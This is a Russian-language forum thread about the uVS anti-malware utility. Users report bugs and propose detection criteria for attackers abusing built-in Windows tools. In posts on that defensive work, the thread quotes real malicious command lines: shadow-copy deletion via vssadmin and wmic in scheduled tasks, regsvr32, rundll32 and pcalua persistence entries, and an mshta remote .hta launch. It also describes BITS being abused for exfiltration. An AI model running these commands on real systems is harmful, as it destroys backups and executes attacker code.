Перейти к содержанию

Recommended Posts

PR55.RP55

При попытке повторно сканировать файл на V.T. выдаётся ошибка: HTTP Status Code: 403 ( и уже давно )

при этот просто проверка файлов работает.

----------------

Уточнение к выше написанному по SLUI.EXE

Понятно, что когда файл просто валяется в каталоге uVS его не увидит ( и это нормально )

Но когда запускаешь файл,  открывается окно, обновляешь список, а uVS файл не видит...

Проверил с другими файлами из winsxs

Файл НЕ обнаруживается при его запуске ( обновление списка )

Файл НЕ обнаруживается при повторном запуске uVS ( вне зависимости от типа запуска )

Файл Обнаруживается только при Многократном\повторном запуске.

т.е. если файл запускался 1-2 раза uVS его не видит. 100%.

После ПЯТИ ЗАПУСКОВ ПОДРЯД видит...

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SQx

Приветствую,

Тут в очередной раз встретил интересную тему на TechNet, касаемо  политики установки приложений .Net Framework. У пользователя на Windows 8.1 при установки  приложений банк-клиента получает сообщение "ваш администратор заблокировал данное приложение, поскольку оно потенциально представляет угрозу вашему компьютеру" далее прерывается установка.

В событиях приложений видно следующее:

Description: Приложение: AlfaDirect.SigningTool.exe
Версия платформы: v4.0.30319
Описание. Процесс был завершен из-за необработанного исключения.
Сведения об исключении: System.Security.Policy.PolicyException
   в System.AppDomain.SetupApplicationHelper(System.Security.Policy.Evidence, System.Security.Policy.Evidence, System.ApplicationIdentity, System.ActivationContext, System.String[])
   в System.AppDomain.InitializeDomainSecurity(System.Security.Policy.Evidence, System.Security.Policy.Evidence, Boolean, IntPtr, Boolean)


Может стоит отслеживать эти настройки в реестре, это бы в некоторых случаях помогло с ложными оповещениями "якобы приложение является потенциально опаснойи представляет угрозу вашему компьютеру".

Что скажете?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

В коде  Microsoft обнаружена ошибка, ( crypt32.dll ) которая отвечает за проверку цифровых  подписей, что потенциально позволяет  подделать подпись файла.

https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

С выходом новой версии Хрома появились записи типа.

Полное имя                  79.0.3945.130
Имя файла                   79.0.3945.130
Тек. статус                 в автозапуске Chrome/Yandex
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске Chrome/Yandex
                            
Доп. информация             на момент обновления списка
Стартовая страница          Chrome

Образ тема:  https://forum.esetnod32.ru/messages/forum4/topic15670/message108070/?result=reply#message108070


                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd, приветствую.

в последнее время, злоумышленники, стремятся обойти защиту в HIPS по блокированию деструктивных действий, в частности удалению теневых копий, переносят удаление в системные задачи.

Цитата

Полное имя                  C:\WINDOWS\SYSTEM32\WBEM\WMIC.EXE
Имя файла                   WMIC.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Удовлетворяет критериям     
WMICDELETESHADOWSCOPY       (ССЫЛКА ~ C:\WINDOWS\SYSTEM32\TASKS\)(1)   AND   (CMDLINE ~ SHADOWCOPY DELETE)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     47919524C8000
Linker                      8.0
Размер                      801280 байт
Создан                      19.01.2008 в 09:13:56
Изменен                     19.01.2008 в 11:00:47
                            
TimeStamp                   19.01.2008 в 06:13:56
EntryPoint                  +
OS Version                  0.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            wmic.exe.mui
Версия файла                6.0.6000.16386 (vista_rtm.061101-2205)
Версия продукта             6.0.6000.16386
Описание                    WMI Commandline Utility
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     SHADOWCOPY DELETE
SHA1                        02316B3393A8F06C0D5132937E268BB0D7044835
MD5                         E24706AFDEAF910604BBFF5D514FA3DA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\WMICRESTORE

и

Цитата

Полное имя                  C:\WINDOWS\SYSTEM32\VSSADMIN.EXE
Имя файла                   VSSADMIN.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Удовлетворяет критериям     
VSSADMINDELETESHADOWSCOPY   (ССЫЛКА ~ C:\WINDOWS\SYSTEM32\TASKS\)(1)   AND   (CMDLINE ~ DELETE SHADOWS /ALL /QUIET)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     479198D722000
Linker                      8.0
Размер                      127488 байт
Создан                      19.01.2008 в 09:29:43
Изменен                     19.01.2008 в 11:00:42
                            
TimeStamp                   19.01.2008 в 06:29:43
EntryPoint                  +
OS Version                  0.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            VSSADMIN.EXE.MUI
Версия файла                6.0.6000.16386 (vista_rtm.061101-2205)
Версия продукта             6.0.6000.16386
Описание                    Интерфейс командной строки для Microsoft® Volume Shadow Copy Service
Продукт                     Операционная система Microsoft® Windows®
Copyright                   © Корпорация Майкрософт. Все права защищены.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     DELETE SHADOWS /ALL /QUIET
SHA1                        51055E07A82F84266A1D594783D785B75452E4D6
MD5                         76A7CD9B76DEA4EF85BB2959F6C36EBA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VSSDATARESTORE

хотелось бы,

1. чтобы в настройках критерия была возможность добавить настраиваемую команду deltsk

2. чтобы была возможность задать приоритет ( для случаев, когда чистый файл используется в деструктивных целях) критерия перед цифровой и безопасным хэшем.
                            

                          

  • Like 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
Цитата

Santy пишет:   для случаев, когда чистый файл используется в деструктивных целях      

https://www.anti-malware.ru/news/2018-07-16-1447/26826

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
В 28.01.2020 at 9:21 PM, santy сказал:

1. чтобы в настройках критерия была возможность добавить настраиваемую команду deltsk 

2. чтобы была возможность задать приоритет ( для случаев, когда чистый файл используется в деструктивных целях) критерия перед цифровой и безопасным хэшем.

посмотрю что там можно сделать, пока с временем проблемы.

  • Like 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
23 минут назад, demkd сказал:

посмотрю что там можно сделать, пока с временем проблемы. 

может в коде программы жестко прописать список системных файлов, через которые возможно выполнить деструктивные действия в системе: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe. И с учетом этого списка уже управлять приоритетом между критериями и белыми хэшами.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

 

Цитата

Santy пишет:  wmic.exe, , cmd.exe, svchost.exe

Можно создать отдельную категорию.

раз это отдельная категория...

 

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
3 часа назад, santy сказал:

И с учетом этого списка уже управлять приоритетом между критериями и белыми хэшами.

не очень хорошая идея, файлов может быть несколько сотен, а то и тысяч на самом деле

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
43 минут назад, demkd сказал:

не очень хорошая идея, файлов может быть несколько сотен, а то и тысяч на самом деле

пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
2 часа назад, PR55.RP55 сказал:

 

Можно создать отдельную категорию.

раз это отдельная категория...

 

 

 

 

можно  и категорию, это непринципиально, лишь бы не было лишних хлопот с дополнительным программированием.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
13 часов назад, santy сказал:

пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить. 

или так, например, сделать:

ввести категорирование критериев с признаком приоритета критерия над цифровой из белого списка и безопасным хэшем.

например: "деструктивное действие, выполняемое системным файлом".... тогда будет не нужен список чистых файлов с потенциально деструктивным действием. бонус здесь еще будет в том, что можно будет систематизировать критерии по категориям.

но это приведет к модификации справочника критериев, поскольку нужно будет добавить поле выбора категории критерия, и нужен будет дополнительно управляемый список категорий критериев, чтобы установить признак приоритета.

ну, и соответственно, это повлияет на правила отбора объектов в группу "подозрительные и вирусы".

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Категория: " Системные  Потенциально Деструктивные <--------- "

Можно установить заглушку: "Не проверять файлы в категории по б.с.ЭЦП;  SHA1 " (  settings.ini  )

( Задаётся любая категория. ( или группа категорий ) )

Значит проверка происходит только по базе поисковых критериев. Если критерий не задан, файл всегда отображается в своей категории.

Добавить в Инфо. : "Команда вне типовых значений - Подозрительная команда "

Доп. информация             на момент обновления списка
CmdLine                     DELETE SHADOWS /ALL /QUIET
SHA1                        51055E07A82F84266A1D594783D785B75452E4D6
MD5                         76A7CD9B76DEA4EF85BB2959F6C36EBA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VSSDATARESTORE 

т.е. после установки системы и базовых компонентов типа NET Framework; Vcredist и т.д. uVS запоминает типовые значения Инфо. и может сравнивать. ( только для основных файлов )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

В uVS есть категория: " Неизв.модули в изв. процессах. "

А категории: " Неизв. команды в изв. процессах. "

Такой категории нет...

----------

Кроме того пора бы уже уйти от практики: " Тихо сам с собою я веду беседу"

А взять\собрать у всех кто работает с uVS базы\критерии и передать Demkd

Поисковые алгоритмы программы должны развиваться - а какое может быть развитие, если всё оставить как есть.

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
3 часа назад, PR55.RP55 сказал:

А взять\собрать у всех кто работает с uVS базы\критерии и передать Demkd

а demkd это надо, разбираться с сотнями записей в списках snms? кому надо, тот спросит или найдет. Ты же публикуешь свои списки. Поделиться можно лишь действительно уникальными критериями, если получается их находить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Сравнивал очистку в uVS и FRST

Если применить FRST ( EmptyTemp ) сразу после очистки в uVS - то программа всегда находит дополнительно 30-50 mb и PC по ощущениям начинает лучше работать. т.е. нужно в этом направлении _обязательно смотреть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
В 08.02.2020 at 12:33 PM, santy сказал:

например: "деструктивное действие, выполняемое системным файлом".... тогда будет не нужен список чистых файлов с потенциально деструктивным действием. бонус здесь еще будет в том, что можно будет систематизировать критерии по категориям.

demkd,

можно еще автоматически карантинить подобные файлы из Prefetch, если для них сработал критерий "деструктивное действие, выполняемое системным файлом"

возможно в самом файле *.pf будет содержаться полезная для анализа информация

https://habr.com/ru/company/group-ib/blog/487516/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Santy пишет:   Пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить.       


Техника LOLbins (living off the land), работает используя легитимные процессы Windows для выполнения вредоносного кода, не запуская собственные исполняемые файлы и процессы.
К примеру, по данным Microsoft, малварь регулярно злоупотребляла msiexec.exe, rundll32.exe, schtasks.exe и т.д. Используя эти процессы для запуска вредоносного кода.


regsvr32.exe

O22 - ScheduledTask: (Ready) {300E0444-6E75-00D4-8C2E-786DE3115137} - {root} - C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\1d479c60\119a6428.dll"
Task: C:\WINDOWS\Tasks\{B1AA8F04-0894-F922-12CF-066671D0E46D}.job => C:\WINDOWS\system32\regsvr32.exe F /s /n /i:/rt C:\DOCUME~1\ALLUSE~1\APPLIC~1\1c89c365\7520cf2e.dll <==== ATTENTION
Task: {9557A449-CB89-49B5-9552-89C8163A54C3} - System32\Tasks\{402A874D-3698-5E16-6CA4-31FE2AC06873} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\c8f9210c\cf9bd03d.dll" <==== ATTENTION
O22 - Task: {77108E3C-4C71-191B-AD1B-E1D1F566BF0E} - C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\bdd75b60\d136dad1.dll"
HKU\S-1-5-21-926217151-4064649387-4294350901-500\...\Run: [Ajjdworks] => regsvr32.exe C:\Users\Администратор\AppData\Local\Ajjdworks\Image.DLL <==== ATTENTION
HKU\S-1-5-21-2939633801-2705330331-3998745655-1001\...\Run: [update_w32.exe] => C:\Windows\system32\regsvr32.exe /s scrrun.dll "D:\Users\Таня\AppData\Roaming\SysplanNT\msimg32.dll" htvrh666 "D:\Users\Таня\AppData\Roaming\SysplanNT\update_w32.exe" r <==== ATTENTION

rundll32.exe

Запуск в командной строке предельно прост — rundll32.exe.
Вызов имени библиотеки DLL происходит без вызова расширения .dll
При этом имя функции выглядит несоответствующим.
В реальности код зловреда запускается одновременно с загрузкой библиотеки DLL.
Бинарный код rundll32.exe, подписанный Windows, копируется в другие локации под именем ******.exe, а затем запускается с помощью той же команды, что и rundll32.exe ранее.

O22 - Task (Ready): BYkucKAbLoZInYF - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\PieSfXRZU\Afbjxp.dll",#1
S2 OtherSearch; rundll32.exe "C:\Program Files (x86)\S9YGPGPPyq\kl.dll",Svc [X] <==== ATTENTION
C:\Program Files (x86)\S9YGPGPPyq\kl.dll
O4 - HKCU\..\Run: [MSIDLL] rundll32.exe msionc32.dll,bQiYtMdJrG
Task: {D70D36C3-72F5-4E28-8622-5F312E2B467B} - System32\Tasks\GAasuBHwSxk => C:\WINDOWS\system32\rundll32.exe


msiexec.exe

HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
Update Manager [20161005]-->MsiExec.exe /I{F428D0FB-765D-40EB-BDD8-A1E7F5C597FA}
globalupdate Helper []-->MsiExec.exe /I{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}


schtasks.exe

schtasks.exe /create /F /tn "123123" /xml "c:\temp\task.xml"
schtasks.exe /run /i /tn "123123"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
17 минут назад, PR55.RP55 сказал:

regsvr32.exe

rundll32.exe

ну, regsvr32.exe и rundll32.exe в любом случае засветятся, потому что здесь будет дополнительно отобран в списке объектов файл, который он запускают или регистрируют.

хотя, дополнительно статус "системного файла с деструктивным действием" не помешает в данном случае.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

cscript.exe

https://tproger.ru/news/winrm-vbs-windows/

https://vms.drweb.com/virus/?i=8365848&lng=en

https://vms.drweb.ru/virus/?i=4154287

O22 - Task: \Microsoft\Windows\Server Manager\CleanupOldPerfLogs - C:\Windows\system32\cscript.exe /B /nologo C:\Windows\system32\calluxxprovider.vbs $(Arg0) $(Arg1) $(Arg2)


mshta.exe

mshta.exe c:\temp.hta
Mshta.exe http://www.******.com/bar.hta

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

wscript.exe, csript.exe, mshta.exe,

так же как regsvr32.exe, rundll32.exe засветят в образе тот отдельный файл, который они выполняют.

---------------------------------

вот еще картинка, как могут быть применены системные файлы в деструктивных действиях.

wmic, bitsadmin:

Программа администрирования BITS (BITS) используется в Windows для загрузки обновлений безопасности. Именно это свойство службы использует киберпреступники, чтобы скрыть свое присутствие на скомпрометированной системе. Еще одна особенность, которая затрудняет предупреждение BITS, заключается в том, что когда опасное приложение загружает файлы с использованием службы, трафик, как представляется, поступает из BITS, а не из приложения.  Возможности злоупотреблений BITS не ограничиваются загрузкой программ. Служба BITS может стать источником утечки информации, если воспользоваться ею для передачи файлов из сети на внешний компьютер

EQ-QkH8U4AAoXTl.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
Цитата

Santy пишет:  wscript.exe, csript.exe, mshta.exe,

так же как regsvr32.exe, rundll32.exe засветят в образе тот отдельный файл, который они выполняют       

Если файл постоянно доступен -  засветят. А если это сетевой ресурс, или внешний накопитель то...

pcalua.exe

Task: {58E521CE-9E9C-4AF4-8672-055BAB6CC610} - System32\Tasks\{71EFCB4A-AFB7-4A1A-BF03-2C4652886663} => C:\Windows\system32\pcalua.exe -a E:\AUTORUN.EXE -d E:\

Task: {39D66A93-E0D4-460F-90A5-7E254BE62565} - System32\Tasks\{5A56217C-FB4D-4CD2-A83E-6660BC431D40} => pcalua.exe -a E:\qfyh01ww.exe -d E:\

Task: {555780F2-DC30-4C70-8322-E018A752B23C} - System32\Tasks\{E1F14680-765F-4CFE-96F6-07A005324F2D} => C:\Windows\system32\pcalua.exe -a C:\Users\Пользователь\Desktop\tconp.exe -d C:\Users\Пользователь\Desktop

O22 - Task: {467E7092-19D2-4143-B5A8-953C2E358898} - C:\Windows\system32\pcalua.exe -a C:\Temp\jre-8u161-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Пока форум не работал по ошибкам, предложениям, замечаниям публиковал здесь:

https://forum.esetnod32.ru/forum8/topic15904/?PAGEN_1=5

------------

Цитата

Полное имя                  C:\USERS\836D~1\APPDATA\LOCAL\TEMP\WCT5E09.TMP
Имя файла                   WCT5E09.TMP
Тек. статус                    ПОДОЗРИТЕЛЬНЫЙ                                                  
Сохраненная информация      на момент создания образа
Статус                      
Инф. о файле                Системе не удается найти указанный путь.
Цифр. подпись               проверка не производилась
                            
BITS Job                    PreSignInSettingsConfigJSON
ID                          1fdd3525-e690-48f9-bcfc-5cf2cc229ea6
URL                      https://g.live.com/odclientsettings/Prod

------------
Образ в теме:  https://forum.esetnod32.ru/messages/forum6/topic16189/message110932/#message110932

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×